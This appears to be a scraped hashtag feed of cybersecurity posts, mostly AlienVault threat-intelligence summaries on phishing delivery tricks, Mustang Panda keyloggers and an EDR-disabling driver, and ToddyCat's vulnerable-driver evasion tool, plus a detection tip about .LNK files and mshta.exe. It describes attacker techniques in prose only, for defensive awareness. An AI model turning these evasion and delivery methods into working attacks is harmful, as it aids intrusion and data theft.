EDR для Windows. Основы, архитектура, принципы работы

В предыдущих статьях,( 1 , 2 , 3 ) цикла, посвященного сбору событий в ОС Windows и Linux, мы рассмотрели, какие типы источников событий важны для мониторинга с точки зрения обеспечения информационной безопасности, а также каким образом осуществляется сбор и отправка соответствующий событий в системы мониторинга, в т.ч. был рассмотрен сбор событий с помощью агентов.

https://habr.com/ru/companies/securityvison/articles/905842/

#информационная_безопасность #аудит_событий #edr #антивирусы

Emerging Phishing Techniques: New Threats and Attack Vectors

This analysis delves into four sophisticated phishing techniques observed in 2025. These include embedding Base64-encoded JavaScript in SVG files, hiding malicious URLs in PDF annotations, using OneDrive links to deliver dynamic phishing content, and nesting MHT files within OpenXML documents. These methods successfully evaded email protections and reached intended victims, demonstrating the increasing sophistication of threat actors. The techniques exploit unconventional file formats, cloud-based platforms, and structural obfuscation to bypass traditional security measures. The findings emphasize the need for improved detection mechanisms, deeper inspection of file structures, and advanced context-aware parsing in email and document security tools.

Pulse ID: 680fac676d706a8fdbc062ab
Pulse Link: https://otx.alienvault.com/pulse/680fac676d706a8fdbc062ab
Pulse Author: AlienVault
Created: 2025-04-28 16:27:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CyberSecurity #EDR #Email #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PDF #Phishing #RAT #SMS #SVG #bot #AlienVault

This is a really nice write up from Sekoia with lots of #ThreatDetection details, regardless of the #EDR you're using.

🔎 Of particular note, this attack is aided with a .LNK file pulling in a .HTA via a remote location.

🕵🏼‍♂️ Detect .LNK files making external connections, they are particularly easy to tune.

🕵🏼‍♂️ Detect mshta.exe running suspicious executables (i.e. cmd.exe).

Happy #ThreatHunting

🔗 https://blog.sekoia.io/detecting-multi-stage-infection-chains-madness/

Latest Mustang Panda Arsenal: Toneshell, StarProxy, PAKLOG, CorKLOG, and SplatCloak

Mustang Panda, a threat actor group, has developed new tools including two keyloggers (PAKLOG and CorKLOG) and an EDR evasion driver (SplatCloak). PAKLOG monitors keystrokes and clipboard data, using a custom encoding scheme. CorKLOG captures keystrokes, encrypts data with RC4, and establishes persistence through services or scheduled tasks. SplatCloak disables kernel-level notification callbacks for Windows Defender and Kaspersky drivers, employing obfuscation techniques like control flow flattening and mixed boolean arithmetic. Along with those tools, the group has been observed using updated versions of ToneShell and a new tool called StarProxy. ToneShell, a backdoor, now features changes in its FakeTLS C2 communication protocol and client identifier storage methods. StarProxy, a lateral movement tool, uses the FakeTLS protocol to proxy traffic and facilitate attacker communications.

Pulse ID: 6800148cd0bb0e7851cc6218
Pulse Link: https://otx.alienvault.com/pulse/6800148cd0bb0e7851cc6218
Pulse Author: AlienVault
Created: 2025-04-16 20:35:24

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Clipboard #CyberSecurity #EDR #InfoSec #Kaspersky #KeyLogger #OTX #OpenThreatExchange #Proxy #TLS #Windows #bot #AlienVault

Chinese APTs Exploit EDR 'Visibility Gap' for Cyber Espionage
https://www.darkreading.com/threat-intelligence/chinese-apt-exploit-edr-visibility-gap-cyber-espionage

#Infosec #Security #Cybersecurity #CeptBiro #ChineseAPT #Exploit #EDR #VisibilityGap #CyberEspionage

Pick your Poison - A Double-Edged Email Attack

A sophisticated cyber-attack has been identified by the Cofense Phishing Defense Center, combining phishing techniques targeting Office365 credentials with malware delivery. The campaign uses a file deletion reminder as bait, exploiting a legitimate file-sharing service to increase credibility. Users are led to a fake Microsoft login page or prompted to download malware disguised as a OneDrive installer. The attack employs ConnectWise RAT, a legitimate remote administration tool exploited for malicious purposes. The malware establishes persistence through system services and registry modifications, highlighting the need for enhanced user awareness and education to combat such dual-threat approaches.

Pulse ID: 67f59820a8fab9815ec86721
Pulse Link: https://otx.alienvault.com/pulse/67f59820a8fab9815ec86721
Pulse Author: AlienVault
Created: 2025-04-08 21:41:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#ConnectWise #CyberSecurity #EDR #Edge #Education #Email #FileSharing #InfoSec #Malware #Microsoft #OTX #Office #OpenThreatExchange #Phishing #RAT #bot #AlienVault

How ToddyCat tried to hide behind AV software

The ToddyCat APT group has developed a sophisticated tool called TCESB to stealthily execute payloads and evade detection. This tool exploits a vulnerability (CVE-2024-11859) in ESET Command line scanner for DLL proxying, using a modified version of the open-source EDRSandBlast malware. TCESB employs techniques like DLL proxying, kernel memory manipulation, and Bring Your Own Vulnerable Driver (BYOVD) to bypass security solutions. It searches for kernel structure addresses using CSV or PDB files, installs a vulnerable Dell driver, and decrypts AES-128 encrypted payloads. The discovery highlights the need for monitoring driver installations and Windows kernel debug symbol loading events to detect such sophisticated attacks.

Pulse ID: 67f3cb12758e286216442770
Pulse Link: https://otx.alienvault.com/pulse/67f3cb12758e286216442770
Pulse Author: AlienVault
Created: 2025-04-07 12:54:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Dell #EDR #ESET #InfoSec #Malware #OTX #OpenThreatExchange #Proxy #RCE #Vulnerability #Windows #bot #AlienVault